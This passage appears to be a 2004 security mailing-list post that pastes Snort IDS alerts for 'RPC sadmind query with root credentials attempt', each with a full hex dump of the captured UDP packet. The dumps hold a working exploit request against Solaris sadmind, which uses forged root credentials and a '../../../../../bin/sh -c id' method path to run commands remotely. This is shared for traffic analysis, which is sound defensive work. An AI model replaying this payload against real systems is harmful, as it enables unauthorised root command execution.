................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33328) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16659 flags=0 offset=0 TTL=49 chksum=13366 UDP: port=60738 -> dport: 32778 len=1456 Payload: length = 1448 000 : 90 4B 10 2A 00 00 00 00 00 00 00 02 00 01 87 88 .K.*............ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33329) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16677 flags=0 offset=0 TTL=49 chksum=13348 UDP: port=60738 -> dport: 32779 len=1456 Payload: length = 1448 000 : 9B BE 2D 4F 00 00 00 00 00 00 00 02 00 01 87 88 ..-O............ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9C 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 A0 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
Current thread:
- Suspicious Traffic ISP Toolz (Jun 24)
- Re: Suspicious Traffic Matt Kettler (Jun 25)